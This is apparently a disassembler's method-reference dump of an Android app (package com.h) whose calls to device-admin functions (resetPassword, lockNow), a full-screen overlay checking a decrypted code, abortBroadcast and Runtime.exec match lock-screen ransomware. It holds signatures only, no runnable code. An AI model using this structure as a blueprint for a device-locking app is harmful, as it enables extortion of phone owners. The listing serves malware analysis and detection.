Lcom/h/M;-><init>()V [access_flags=public constructor] @ 0x19e0
Landroid/app/Activity;-><init>()V
Lcom/h/M;->activiteDevice()V [access_flags=private] @ 0x19fc
Landroid/content/ComponentName;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
Landroid/content/Intent;-><init>(Ljava/lang/String;)V
Lcom/h/M;->startActivityForResult(Landroid/content/Intent; I)V
Ljava/lang/NoClassDefFoundError;-><init>(Ljava/lang/String;)V
Landroid/content/Intent;->putExtra(Ljava/lang/String; Landroid/os/Parcelable;)Landroid/content/Intent;
Lcom/h/M;->onCreate(Landroid/os/Bundle;)V [access_flags=public] @ 0x1a90
LLogCatBroadcaster;->start(Landroid/content/Context;)V [access_flags=public static synchronized] @ 0x1b00
Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
Lcom/h/MyAdmin;-><init>()V [access_flags=public constructor] @ 0x1778
Landroid/app/admin/DeviceAdminReceiver;-><init>()V
Lcom/h/MyAdmin;->onDisableRequested(Landroid/content/Context; Landroid/content/Intent;)Ljava/lang/CharSequence; [access_flags=public] @ 0x1794
Lcom/h/MyAdmin;->getManager(Landroid/content/Context;)Landroid/app/admin/DevicePolicyManager;
Landroid/app/admin/DeviceAdminReceiver;->onDisableRequested(Landroid/content/Context; Landroid/content/Intent;)Ljava/lang/CharSequence;
Ljava/lang/Integer;->toString(I)Ljava/lang/String;
Landroid/app/admin/DevicePolicyManager;->resetPassword(Ljava/lang/String; I)Z
Landroid/app/admin/DevicePolicyManager;->lockNow()V
Lcom/h/MyAdmin;->onEnabled(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x17fc
Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
Landroid/app/admin/DeviceAdminReceiver;->onEnabled(Landroid/content/Context; Landroid/content/Intent;)V
Lcom/h/MyAdmin;->onPasswordChanged(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x18b8
Landroid/app/admin/DeviceAdminReceiver;->onPasswordChanged(Landroid/content/Context; Landroid/content/Intent;)V
Lcom/h/MyAdmin;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x191c
Landroid/util/Log;->i(Ljava/lang/String; Ljava/lang/String;)I
Landroid/app/admin/DeviceAdminReceiver;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V
Landroid/content/Context;->getApplicationInfo()Landroid/content/pm/ApplicationInfo;
Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
LLogCatBroadcaster;-><init>(Landroid/content/Context;)V [access_flags=private constructor] @ 0x1ad8
Landroid/content/pm/PackageManager;->getPackageInfo(Ljava/lang/String; I)Landroid/content/pm/PackageInfo;
Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
Ljava/lang/Thread;->start()V
Ljava/lang/Object;-><init>()V
LLogCatBroadcaster;->run()V [access_flags=public] @ 0x1be4
Landroid/content/Context;->sendBroadcast(Landroid/content/Intent;)V
Ljava/io/BufferedReader;-><init>(Ljava/io/Reader; I)V
Ljava/lang/Process;->getInputStream()Ljava/io/InputStream;
Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
Landroid/content/Intent;-><init>()V
Landroid/content/Intent;->setAction(Ljava/lang/String;)Landroid/content/Intent;
Landroid/content/Intent;->putExtra(Ljava/lang/String; [Ljava/lang/String;)Landroid/content/Intent;
Landroid/content/Intent;->setPackage(Ljava/lang/String;)Landroid/content/Intent;
Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
Ljava/io/InputStreamReader;-><init>(Ljava/io/InputStream;)V
Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
Lcom/h/R$attr;-><init>()V [access_flags=public constructor] @ 0x196c
Lcom/h/R$color;-><init>()V [access_flags=public constructor] @ 0x175c
Lcom/h/R$drawable;-><init>()V [access_flags=public constructor] @ 0x1950
Lcom/h/R$id;-><init>()V [access_flags=public constructor] @ 0x236c
Lcom/h/R$layout;-><init>()V [access_flags=public constructor] @ 0x2350
Lcom/h/R$anim;-><init>()V [access_flags=public constructor] @ 0x2490
Lcom/h/R$style;-><init>()V [access_flags=public constructor] @ 0x1740
Lcom/h/R$xml;-><init>()V [access_flags=public constructor] @ 0x2318
Lcom/h/R;-><init>()V [access_flags=public constructor] @ 0x2474
Lcom/h/bbb;-><init>()V [access_flags=public constructor] @ 0x1680
Landroid/content/BroadcastReceiver;-><init>()V
Lcom/h/bbb;->onReceive(Landroid/content/Context; Landroid/content/Intent;)V [access_flags=public] @ 0x169c
Landroid/content/Intent;->getAction()Ljava/lang/String;
Ljava/lang/String;->equals(Ljava/lang/Object;)Z
Lcom/h/bbb;->abortBroadcast()V
Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
Lcom/h/s$100000000;-><init>(Lcom/h/s;)V [access_flags=constructor] @ 0x1988
Ljava/lang/Thread;-><init>()V
Lcom/h/s$100000000;->start()V
Lcom/h/s$100000001;-><init>(Lcom/h/s;)V [access_flags=constructor] @ 0x2388
Lcom/h/s$100000001;->onClick(Landroid/view/View;)V [access_flags=public] @ 0x23cc
Landroid/view/WindowManager;->removeView(Landroid/view/View;)V
Landroid/content/SharedPreferences;->getString(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
Landroid/widget/EditText;->getText()Landroid/text/Editable;
Lcom/h/DU;->decrypt(Ljava/lang/String;)Ljava/lang/String;
Lcom/h/s;->access$L1000002(Lcom/h/s;)Landroid/view/View; [access_flags=static synthetic] @ 0x1d04
Lcom/h/s;->stopSelf()V
Landroid/text/Editable;->toString()Ljava/lang/String;
Lcom/h/s;->access$L1000001(Lcom/h/s;)Landroid/view/WindowManager; [access_flags=static synthetic] @ 0x1ce8
Lcom/h/s;-><init>()V [access_flags=public constructor] @ 0x1ccc
Landroid/app/Service;-><init>()V
Lcom/h/s;->c()V [access_flags=private] @ 0x1d60
Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V
Lcom/h/s;->getApplication()Landroid/app/Application;
Landroid/widget/TextView;->append(Ljava/lang/CharSequence;)V
Landroid/widget/EditText;->setHint(Ljava/lang/CharSequence;)V
Ljava/lang/StringBuffer;-><init>()V
Landroid/view/View;->findViewById(I)Landroid/view/View;
Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
Landroid/content/SharedPreferences;->getLong(Ljava/lang/String; J)J
Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
Landroid/view/WindowManager$LayoutParams;-><init>()V
Landroid/view/LayoutInflater;->from(Landroid/content/Context;)Landroid/view/LayoutInflater;
Landroid/view/LayoutInflater;->inflate(I Landroid/view/ViewGroup;)Landroid/view/View;
Ljava/lang/StringBuffer;->append(J)Ljava/lang/StringBuffer;
Landroid/view/WindowManager;->addView(Landroid/view/View; Landroid/view/ViewGroup$LayoutParams;)V
Landroid/app/Application;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Lcom/h/s;->is(Landroid/content/Context;)Z [access_flags=public] @ 0x1fa8
Landroid/net/ConnectivityManager;->getActiveNetworkInfo()Landroid/net/NetworkInfo;
Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
Landroid/net/NetworkInfo;->isAvailable()Z
Lcom/h/s;->onCreate()V [access_flags=public] @ 0x201c
Lcom/h/s;->getSharedPreferences(Ljava/lang/String; I)Landroid/content/SharedPreferences;
Landroid/content/SharedPreferences$Editor;->commit()Z
Ljava/lang/StringBuffer;->append(Ljava/lang/Object;)Ljava/lang/StringBuffer;
Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String; Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
Lcom/h/s;->getApplicationContext()Landroid/content/Context;
Ljava/lang/Long;->parseLong(Ljava/lang/String;)J
Ljava/lang/Math;->random()D
Lcom/h/DU;->encrypt(Ljava/lang/String;)Ljava/lang/String;
Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String; J)Landroid/content/SharedPreferences$Editor;
Lcom/h/DU;-><init>(Ljava/lang/String;)V
Landroid/app/Service;->onCreate()V
Ljava/lang/Long;-><init>(J)V
Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
Lcom/h/s;->onStart(Landroid/content/Intent; I)V [access_flags=public] @ 0x22ec
Landroid/app/Service;->onStart(Landroid/content/Intent; I)V
Lcom/h/R$string;-><init>()V [access_flags=public constructor] @ 0x2334
